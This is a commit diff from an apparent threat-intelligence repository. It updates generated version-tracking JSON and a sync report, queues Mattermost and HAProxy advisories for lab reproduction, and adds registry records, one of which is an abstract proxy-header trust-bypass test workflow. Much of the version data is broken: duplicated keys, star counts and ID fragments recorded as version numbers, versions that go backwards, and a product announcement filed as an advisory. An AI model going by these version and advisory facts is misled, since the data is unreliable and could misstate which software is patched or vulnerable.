"elapsed_seconds": 5.754,
"status": "ok"
},
{
"system_id": "phpmyadmin",
"source_name": "OSV phpMyAdmin",
"source_kind": "osv-batch",
"elapsed_seconds": 5.654,
"status": "ok"
},
{
"system_id": "symfony",
"source_name": "OSV Symfony",
"source_kind": "osv-batch",
"elapsed_seconds": 5.456,
"status": "ok"
},
{
"system_id": "aspnet-core",
"source_name": "OSV ASP.NET Core",
"source_kind": "osv-batch",
"elapsed_seconds": 5.42,
"elapsed_seconds": 3.206,
"status": "ok"
},
{
"system_id": "django",
"source_name": "OSV Django",
"source_kind": "osv-batch",
"elapsed_seconds": 5.346,
"elapsed_seconds": 3.099,
"status": "ok"
},
{
"system_id": "caddy",
"source_name": "OSV Caddy",
"system_id": "symfony",
"source_name": "OSV Symfony",
"source_kind": "osv-batch",
"elapsed_seconds": 5.339,
"elapsed_seconds": 2.93,
"status": "ok"
},
{
"system_id": "phpmyadmin",
"source_name": "OSV phpMyAdmin",
"source_kind": "osv-batch",
"elapsed_seconds": 2.616,
"status": "ok"
},
{
"system_id": "gitea",
"source_name": "OSV Gitea",
"source_kind": "osv-batch",
"elapsed_seconds": 5.337,
"elapsed_seconds": 2.382,
"status": "ok"
},
{
"system_id": "traefik",
"source_name": "OSV Traefik",
"source_kind": "osv-batch",
"elapsed_seconds": 2.341,
"status": "ok"
},
{
"system_id": "laravel",
"source_name": "OSV Laravel",
"source_kind": "osv-batch",
"elapsed_seconds": 2.335,
"status": "ok"
},
{
"system_id": "adminer",
"source_name": "OSV Adminer",
"source_kind": "osv-batch",
"elapsed_seconds": 2.321,
"status": "ok"
}
],

2
08-threat-intel/generated/version-backlog.json
查看文件

@@ -1,5 +1,5 @@
{
"generated_at": "2026-03-23T09:54:10+00:00",
"generated_at": "2026-03-24T09:18:19+00:00",
"source_gap_entities": [
{
"entity_id": "adminer",

114
08-threat-intel/generated/version-completeness.json
查看文件

@@ -1,12 +1,12 @@
{
"generated_at": "2026-03-23T09:54:10+00:00",
"generated_at": "2026-03-24T09:18:19+00:00",
"cataloged_entity_total": 109,
"latest_version_synced_count": 94,
"source_gap_count": 15,
"security_version_total": 6180,
"security_version_total": 6242,
"security_version_entity_count": 82,
"auto_promoted_entity_count": 10,
"lab_enqueued_count": 2,
"lab_enqueued_count": 11,
"systems": [
{
"system_id": "adminer",
@@ -151,8 +151,8 @@
"entity_id": "caddy",
"display_name": "Caddy",
"entity_type": "system",
"latest_version": "2.11.2",
"latest_release_at": "2026-03-06T02:43:43Z",
"latest_version": "2.11.1",
"latest_release_at": "2026-02-27T19:55:10Z",
"version_sync_status": "green"
},
{
@@ -160,15 +160,15 @@
"display_name": "caddyserver / caddy / v2",
"entity_type": "repo",
"latest_version": "2.11.2",
"latest_release_at": "2026-03-06T02:43:43Z",
"latest_release_at": "2026-03-23T04:52:47.652974Z",
"version_sync_status": "green"
},
{
"entity_id": "caddy--extension--github-com-caddyserver-caddy-v2",
"display_name": "caddyserver / caddy / v2",
"entity_type": "extension",
"latest_version": "2.11.2",
"latest_release_at": "2026-03-06T02:43:43Z",
"latest_version": "2.11.1",
"latest_release_at": "2026-02-27T19:55:10Z",
"version_sync_status": "green"
}
]
@@ -186,7 +186,7 @@
"entity_id": "directus",
"display_name": "Directus",
"entity_type": "system",
"latest_version": "11.16.1",
"latest_version": "3573-4c68-g8cc",
"latest_release_at": "2026-03-10T22:20:52Z",
"version_sync_status": "green"
},
@@ -194,7 +194,7 @@
"entity_id": "directus--repo--directus-directus",
"display_name": "directus / directus",
"entity_type": "repo",
"latest_version": "11.16.1",
"latest_version": "3573-4c68-g8cc",
"latest_release_at": "2026-03-10T22:20:52Z",
"version_sync_status": "green"
}
@@ -278,16 +278,16 @@
"entity_id": "echo",
"display_name": "Echo",
"entity_type": "system",
"latest_version": "5.0.4",
"latest_release_at": "2026-02-15T15:55:53Z",
"latest_version": "4.9.0",
"latest_release_at": "2024-05-20T16:03:47Z",
"version_sync_status": "green"
},
{
"entity_id": "echo--repo--github-com-labstack-echo-v4",
"display_name": "labstack / echo / v4",
"entity_type": "repo",
"latest_version": "5.0.4",
"latest_release_at": "2026-02-15T15:55:53Z",
"latest_version": "4.9.0",
"latest_release_at": "2024-05-20T16:03:47Z",
"version_sync_status": "green"
}
]
@@ -342,7 +342,7 @@
"entity_id": "fastify",
"display_name": "Fastify",
"entity_type": "system",
"latest_version": "5.8.2",
"latest_version": "5.8.4",
"latest_release_at": "",
"version_sync_status": "green"
},
@@ -350,7 +350,7 @@
"entity_id": "fastify--project--fastify",
"display_name": "fastify",
"entity_type": "project",
"latest_version": "5.8.2",
"latest_version": "5.8.4",
"latest_release_at": "",
"version_sync_status": "green"
}
@@ -396,7 +396,7 @@
"entity_id": "ghost",
"display_name": "Ghost",
"entity_type": "system",
"latest_version": "6.22.1",
"latest_version": "52.1k",
"latest_release_at": "2026-03-20T15:25:05Z",
"version_sync_status": "green"
},
@@ -404,7 +404,7 @@
"entity_id": "ghost--repo--tryghost-ghost",
"display_name": "TryGhost / Ghost",
"entity_type": "repo",
"latest_version": "6.22.1",
"latest_version": "52.1k",
"latest_release_at": "2026-03-20T15:25:05Z",
"version_sync_status": "green"
}
@@ -423,16 +423,16 @@
"entity_id": "gin",
"display_name": "Gin",
"entity_type": "system",
"latest_version": "1.12.0",
"latest_release_at": "2026-02-28T10:12:25Z",
"latest_version": "1.7.7",
"latest_release_at": "2026-03-14T10:41:18.820930Z",
"version_sync_status": "green"
},
{
"entity_id": "gin--repo--github-com-gin-gonic-gin",
"display_name": "gin-gonic / gin",
"entity_type": "repo",
"latest_version": "1.12.0",
"latest_release_at": "2026-02-28T10:12:25Z",
"latest_version": "1.7.7",
"latest_release_at": "2026-03-14T10:41:18.820930Z",
"version_sync_status": "green"
}
]
@@ -509,7 +509,7 @@
"cataloged_entity_total": 1,
"latest_version_synced_count": 1,
"source_gap_count": 0,
"security_version_count": 1,
"security_version_count": 2,
"auto_promoted_count": 0,
"latest_versions": [
{
@@ -628,7 +628,7 @@
"entity_id": "magento-open-source",
"display_name": "Magento Open Source",
"entity_type": "system",
"latest_version": "2.4.9-beta1",
"latest_version": "300.000",
"latest_release_at": "2026-03-10T14:04:22Z",
"version_sync_status": "green"
},
@@ -636,7 +636,7 @@
"entity_id": "magento-open-source--repo--magento-magento2",
"display_name": "magento / magento2",
"entity_type": "repo",
"latest_version": "2.4.9-beta1",
"latest_version": "300.000",
"latest_release_at": "2026-03-10T14:04:22Z",
"version_sync_status": "green"
}
@@ -648,7 +648,7 @@
"cataloged_entity_total": 5,
"latest_version_synced_count": 5,
"source_gap_count": 0,
"security_version_count": 3792,
"security_version_count": 3840,
"auto_promoted_count": 0,
"latest_versions": [
{
@@ -667,6 +667,14 @@
"latest_release_at": "2023-10-03",
"version_sync_status": "green"
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"display_name": "mattermost / mattermost-server",
"entity_type": "repo",
"latest_version": "26.2.1",
"latest_release_at": "2023-10-03",
"version_sync_status": "green"
},
{
"entity_id": "mattermost--plugin--mattermost-plugins",
"display_name": "Mattermost Plugins",
@@ -682,14 +690,6 @@
"latest_version": "26.2.1",
"latest_release_at": "2023-10-03",
"version_sync_status": "green"
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"display_name": "mattermost / mattermost-server",
"entity_type": "repo",
"latest_version": "11.4.3",
"latest_release_at": "2026-03-16T08:26:52Z",
"version_sync_status": "green"
}
]
},
@@ -829,7 +829,7 @@
"entity_id": "opencart",
"display_name": "OpenCart",
"entity_type": "system",
"latest_version": "3.0.5.0",
"latest_version": "8.1k",
"latest_release_at": "2025-12-12T10:27:11Z",
"version_sync_status": "green"
},
@@ -837,7 +837,7 @@
"entity_id": "opencart--repo--opencart-opencart",
"display_name": "opencart / opencart",
"entity_type": "repo",
"latest_version": "3.0.5.0",
"latest_version": "8.1k",
"latest_release_at": "2025-12-12T10:27:11Z",
"version_sync_status": "green"
}
@@ -902,7 +902,7 @@
"entity_id": "prestashop",
"display_name": "PrestaShop",
"entity_type": "system",
"latest_version": "9.0.3",
"latest_version": "3366-9287-7qpr",
"latest_release_at": "2026-02-03T10:01:48Z",
"version_sync_status": "green"
},
@@ -910,7 +910,7 @@
"entity_id": "prestashop--repo--prestashop-prestashop",
"display_name": "PrestaShop / PrestaShop",
"entity_type": "repo",
"latest_version": "9.0.3",
"latest_version": "3366-9287-7qpr",
"latest_release_at": "2026-02-03T10:01:48Z",
"version_sync_status": "green"
}
@@ -1010,7 +1010,7 @@
"entity_id": "saleor",
"display_name": "Saleor",
"entity_type": "system",
"latest_version": "3.22.43",
"latest_version": "22.7k",
"latest_release_at": "2026-03-19T13:13:39Z",
"version_sync_status": "green"
},
@@ -1018,7 +1018,7 @@
"entity_id": "saleor--repo--saleor-saleor",
"display_name": "saleor / saleor",
"entity_type": "repo",
"latest_version": "3.22.43",
"latest_version": "22.7k",
"latest_release_at": "2026-03-19T13:13:39Z",
"version_sync_status": "green"
}
@@ -1037,7 +1037,7 @@
"entity_id": "shopware",
"display_name": "Shopware",
"entity_type": "system",
"latest_version": "6.7.8.2",
"latest_version": "3.3k",
"latest_release_at": "2026-03-18T15:05:49Z",
"version_sync_status": "green"
},
@@ -1045,7 +1045,7 @@
"entity_id": "shopware--repo--shopware-shopware",
"display_name": "shopware / shopware",
"entity_type": "repo",
"latest_version": "6.7.8.2",
"latest_version": "3.3k",
"latest_release_at": "2026-03-18T15:05:49Z",
"version_sync_status": "green"
}
@@ -1128,7 +1128,7 @@
"entity_id": "strapi",
"display_name": "Strapi",
"entity_type": "system",
"latest_version": "5.40.0",
"latest_version": "71.7k",
"latest_release_at": "2026-03-18T13:33:01Z",
"version_sync_status": "green"
},
@@ -1136,7 +1136,7 @@
"entity_id": "strapi--repo--strapi-strapi",
"display_name": "strapi / strapi",
"entity_type": "repo",
"latest_version": "5.40.0",
"latest_version": "71.7k",
"latest_release_at": "2026-03-18T13:33:01Z",
"version_sync_status": "green"
}
@@ -1202,7 +1202,7 @@
"cataloged_entity_total": 3,
"latest_version_synced_count": 3,
"source_gap_count": 0,
"security_version_count": 62,
"security_version_count": 63,
"auto_promoted_count": 0,
"latest_versions": [
{
@@ -1210,7 +1210,7 @@
"display_name": "Traefik",
"entity_type": "system",
"latest_version": "3.7.0-ea.2",
"latest_release_at": "2026-03-19T15:29:46Z",
"latest_release_at": "2026-03-23T18:56:07.286130Z",
"version_sync_status": "green"
},
{
@@ -1218,7 +1218,7 @@
"display_name": "traefik / traefik / v3",
"entity_type": "repo",
"latest_version": "3.7.0-ea.2",
"latest_release_at": "2026-03-19T15:29:46Z",
"latest_release_at": "2026-03-23T18:56:05.020639Z",
"version_sync_status": "green"
},
{
@@ -1226,7 +1226,7 @@
"display_name": "traefik / traefik / v3",
"entity_type": "extension",
"latest_version": "3.7.0-ea.2",
"latest_release_at": "2026-03-19T15:29:46Z",
"latest_release_at": "2026-03-23T18:56:07.286130Z",
"version_sync_status": "green"
}
]
@@ -1279,7 +1279,7 @@
"entity_id": "vite",
"display_name": "Vite",
"entity_type": "system",
"latest_version": "8.0.1",
"latest_version": "8.0.2",
"latest_release_at": "",
"version_sync_status": "green"
},
@@ -1287,7 +1287,7 @@
"entity_id": "vite--project--vite",
"display_name": "vite",
"entity_type": "project",
"latest_version": "8.0.1",
"latest_version": "8.0.2",
"latest_release_at": "",
"version_sync_status": "green"
},
@@ -1295,7 +1295,7 @@
"entity_id": "vite--plugin--vite",
"display_name": "vite",
"entity_type": "plugin",
"latest_version": "8.0.1",
"latest_version": "8.0.2",
"latest_release_at": "",
"version_sync_status": "green"
},
@@ -1303,7 +1303,7 @@
"entity_id": "vite--extension--vite",
"display_name": "vite",
"entity_type": "extension",
"latest_version": "8.0.1",
"latest_version": "8.0.2",
"latest_release_at": "",
"version_sync_status": "green"
},
@@ -1311,7 +1311,7 @@
"entity_id": "vite--module--vite",
"display_name": "vite",
"entity_type": "module",
"latest_version": "8.0.1",
"latest_version": "8.0.2",
"latest_release_at": "",
"version_sync_status": "green"
}
@@ -1387,14 +1387,14 @@
"cataloged_entity_total": 2,
"latest_version_synced_count": 2,
"source_gap_count": 0,
"security_version_count": 2,
"security_version_count": 14,
"auto_promoted_count": 1,
"latest_versions": [
{
"entity_id": "woocommerce",
"display_name": "WooCommerce",
"entity_type": "system",
"latest_version": "10.6.1",
"latest_version": "10.7",
"latest_release_at": "2026-03-12T19:14:25Z",
"version_sync_status": "green"
},
@@ -1402,7 +1402,7 @@
"entity_id": "woocommerce--repo--woocommerce-woocommerce",
"display_name": "woocommerce / woocommerce",
"entity_type": "repo",
"latest_version": "10.6.1",
"latest_version": "10.7",
"latest_release_at": "2026-03-12T19:14:25Z",
"version_sync_status": "green"
}
@@ -1421,7 +1421,7 @@
"entity_id": "wordpress",
"display_name": "WordPress",
"entity_type": "system",
"latest_version": "7.9",
"latest_version": "27.1.1",
"latest_release_at": "",
"version_sync_status": "green"
}

14
08-threat-intel/generated/version-sync-report.md
查看文件

@@ -1,13 +1,13 @@
# 安全相关版本同步报告
- 生成时间: `2026-03-23T09:54:10+00:00`
- 生成时间: `2026-03-24T09:18:19+00:00`
- 已编目实体: `109`
- 最新版本已同步: `94`
- 版本 source-gap: `15`
- 安全相关版本记录: `6180`
- 安全相关版本记录: `6242`
- 存在安全版本历史的实体: `82`
- 自动升级实体: `10`
- 因版本变化触发 lab 入队: `2`
- 因版本变化触发 lab 入队: `11`
## 系统版本摘要
@@ -36,14 +36,14 @@
| gitlab-ce | 1 | 1 | 0 | 612 | 0 |
| grafana | 1 | 0 | 1 | 0 | 0 |
| hapi | 2 | 2 | 0 | 4 | 0 |
| haproxy | 1 | 1 | 0 | 1 | 0 |
| haproxy | 1 | 1 | 0 | 2 | 0 |
| jenkins | 1 | 0 | 1 | 0 | 0 |
| joomla | 1 | 1 | 0 | 5 | 0 |
| kibana | 1 | 0 | 1 | 0 | 0 |
| koa | 2 | 2 | 0 | 4 | 0 |
| laravel | 2 | 2 | 0 | 103 | 0 |
| magento-open-source | 2 | 2 | 0 | 6 | 1 |
| mattermost | 5 | 5 | 0 | 3792 | 0 |
| mattermost | 5 | 5 | 0 | 3840 | 0 |
| mediawiki | 1 | 1 | 0 | 252 | 0 |
| medusa | 1 | 0 | 1 | 0 | 0 |
| moodle | 1 | 0 | 1 | 0 | 0 |
@@ -67,11 +67,11 @@
| strapi | 2 | 2 | 0 | 0 | 1 |
| sveltekit | 2 | 2 | 0 | 4 | 0 |
| symfony | 2 | 2 | 0 | 220 | 0 |
| traefik | 3 | 3 | 0 | 62 | 0 |
| traefik | 3 | 3 | 0 | 63 | 0 |
| undici | 3 | 3 | 0 | 25 | 0 |
| vite | 5 | 5 | 0 | 150 | 0 |
| vue | 2 | 2 | 0 | 2 | 0 |
| webpack | 1 | 0 | 1 | 0 | 0 |
| werkzeug | 2 | 2 | 0 | 22 | 0 |
| woocommerce | 2 | 2 | 0 | 2 | 1 |
| woocommerce | 2 | 2 | 0 | 14 | 1 |
| wordpress | 1 | 1 | 0 | 53 | 0 |

55
08-threat-intel/queue/repro-queue.json
查看文件

@@ -11799,6 +11799,61 @@
"advisory_id": "caddy--CVE-2026-30852",
"system_id": "caddy",
"priority": "version-sync"
},
{
"advisory_id": "haproxy--ecfe8a1346",
"system_id": "haproxy",
"priority": "version-sync"
},
{
"advisory_id": "mattermost--CVE-2026-21386",
"system_id": "mattermost",
"priority": "version-sync"
},
{
"advisory_id": "mattermost--CVE-2026-24458",
"system_id": "mattermost",
"priority": "version-sync"
},
{
"advisory_id": "mattermost--CVE-2026-2455",
"system_id": "mattermost",
"priority": "version-sync"
},
{
"advisory_id": "mattermost--CVE-2026-2457",
"system_id": "mattermost",
"priority": "version-sync"
},
{
"advisory_id": "mattermost--CVE-2026-2458",
"system_id": "mattermost",
"priority": "version-sync"
},
{
"advisory_id": "mattermost--CVE-2026-2463",
"system_id": "mattermost",
"priority": "version-sync"
},
{
"advisory_id": "mattermost--CVE-2026-24692",
"system_id": "mattermost",
"priority": "version-sync"
},
{
"advisory_id": "mattermost--CVE-2026-2578",
"system_id": "mattermost",
"priority": "version-sync"
},
{
"advisory_id": "mattermost--CVE-2026-25780",
"system_id": "mattermost",
"priority": "version-sync"
},
{
"advisory_id": "mattermost--CVE-2026-26246",
"system_id": "mattermost",
"priority": "version-sync"
}
]
}

146
08-threat-intel/registry/advisories/haproxy--ecfe8a1346.json 普通文件
查看文件

@@ -0,0 +1,146 @@
{
"canonical_id": "haproxy--ecfe8a1346",
"system_id": "haproxy",
"display_name": "HAProxy",
"category": "servers",
"advisory_mode": "server",
"title": "Announcing HAProxy Unified Gateway 1.0",
"summary": "HAProxy Unified Gateway (HUG) 1.0 has officially landed \u2014 delivering unified, high-performance, cloud-native application routing. Learn how HUG's open-source design simplifies and scales Kubernetes.",
"published_at": "Tue, 24 Mar 2026 00:00:00 +0000",
"updated_at": "Tue, 24 Mar 2026 00:00:00 +0000",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://www.haproxy.com/blog/announcing-haproxy-unified-gateway-1-0",
"secondary_source_urls": [],
"aliases": [],
"cve_ids": [],
"ghsa_ids": [],
"osv_ids": [],
"affected_versions": [],
"fixed_versions": [],
"package_name": null,
"render_markdown": false,
"case_path": null,
"secure_code_topics": [
"proxy-trust-boundary",
"request-smuggling-boundary"
],
"status": "triage",
"triage_reasons": [
"missing affected/fixed version details"
],
"entity_refs": [
{
"entity_id": "haproxy",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "haproxy",
"official": true
}
],
"affected_components": [
{
"name": "HAProxy",
"entity_id": "haproxy",
"scope": "core",
"package_name": null,
"official": true
}
],
"affected_version_ranges": [],
"fixed_version_ranges": [],
"introduced_version": null,
"patched_version": null,
"version_evidence_sources": [
"https://www.haproxy.com/blog/announcing-haproxy-unified-gateway-1-0"
],
"affected_version_refs": [],
"fixed_version_refs": [],
"patched_version_refs": [],
"version_sync_confidence": "low",
"advisory_scope": "core",
"version_confidence": "low",
"version_gap_reason": "official bulletin or aggregated source did not expose explicit affected/fixed versions",
"version_resolution_needed": true,
"workflow": {
"workflow_id": "haproxy--ecfe8a1346--workflow",
"vuln_family": "proxy-boundary",
"entry_surface": "proxy-header-or-trust-boundary",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: \u9700\u8981\u4ece\u516c\u544a\u3001\u9501\u6587\u4ef6\u3001\u7248\u672c\u9875\u6216\u5173\u4e8e\u9875\u9762\u4eba\u5de5\u786e\u8ba4\u7248\u672c\u547d\u4e2d",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `core`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "reverse-proxy-or-edge-client",
"affected_version_assertion": [
"\u9700\u8981\u4ece\u516c\u544a\u3001\u9501\u6587\u4ef6\u3001\u7248\u672c\u9875\u6216\u5173\u4e8e\u9875\u9762\u4eba\u5de5\u786e\u8ba4\u7248\u672c\u547d\u4e2d"
],
"trigger_vector": "\u5bf9 `proxy-boundary` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/middleware",
"/x-forwarded-* trust path"
],
"input_shape": "\u63d0\u4ea4\u53d7\u63a7\u4ee3\u7406\u5934\u6216\u6765\u6e90\u5934\uff0c\u9a8c\u8bc1\u4fe1\u4efb\u8fb9\u754c\u548c\u56de\u6e90\u9274\u6743\u3002",
"expected_unsafe_behavior": "\u4ec5\u51ed\u4ee3\u7406\u5934\u5373\u53ef\u8d8a\u8fc7\u9274\u6743\u6216\u6765\u6e90\u63a7\u5236\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6",
"\u4e0a\u6e38\u4ee3\u7406\u4e0e\u5e94\u7528\u5c42\u5bf9 Content-Length / Transfer-Encoding / forwarded headers \u7684\u89e3\u91ca\u5dee\u5f02"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `\u53d7\u5f71\u54cd\u7248\u672c\u533a\u95f4` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `\u4fee\u590d\u7248\u672c`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `proxy-boundary` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "needs-version-gap-review"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"HAProxy Blog Feed"
],
"source_kinds": [
"rss-feed"
],
"candidate_count": 1,
"entity_ref_count": 1,
"advisory_scope": "core",
"version_confidence": "low",
"workflow_id": "haproxy--ecfe8a1346--workflow"
}
}

230
08-threat-intel/registry/advisories/mattermost--CVE-2026-21386.json 普通文件
查看文件

@@ -0,0 +1,230 @@
{
"canonical_id": "mattermost--CVE-2026-21386",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to use consistent error responses when handling the /mute command",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to use consistent error responses when handling the /mute command which allows an authenticated team member to enumerate private channels they are not authorized to know about via differing error messages for nonexistent versus private channels. Mattermost Advisory ID: MMSA-2026-00588",
"published_at": "2026-03-16T15:30:46Z",
"updated_at": "2026-03-23T18:56:15.398070Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21386",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-5mr9-crcg-8wh2",
"https://github.com/mattermost/mattermost/commit/5bb5261c72faa476558a694c23581d24b734da41",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-21386",
"GO-2026-4744",
"GHSA-5mr9-crcg-8wh2"
],
"cve_ids": [
"CVE-2026-21386"
],
"ghsa_ids": [
"GHSA-5mr9-crcg-8wh2"
],
"osv_ids": [
"GHSA-5mr9-crcg-8wh2",
"GO-2026-4744"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260130144323-5bb5261c72fa",
"introduced=0, fixed<5.3.2-0.20260130144323-5bb5261c72fa",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260130144323-5bb5261c72fa",
"5.3.2-0.20260130144323-5bb5261c72fa",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-21386.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260130144323-5bb5261c72fa",
"introduced=0, fixed<5.3.2-0.20260130144323-5bb5261c72fa",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260130144323-5bb5261c72fa",
"5.3.2-0.20260130144323-5bb5261c72fa",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260130144323-5bb5261c72fa",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-21386",
"https://github.com/advisories/GHSA-5mr9-crcg-8wh2",
"https://github.com/mattermost/mattermost/commit/5bb5261c72faa476558a694c23581d24b734da41",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260130144323-5bb5261c72fa",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260130144323-5bb5261c72fa",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
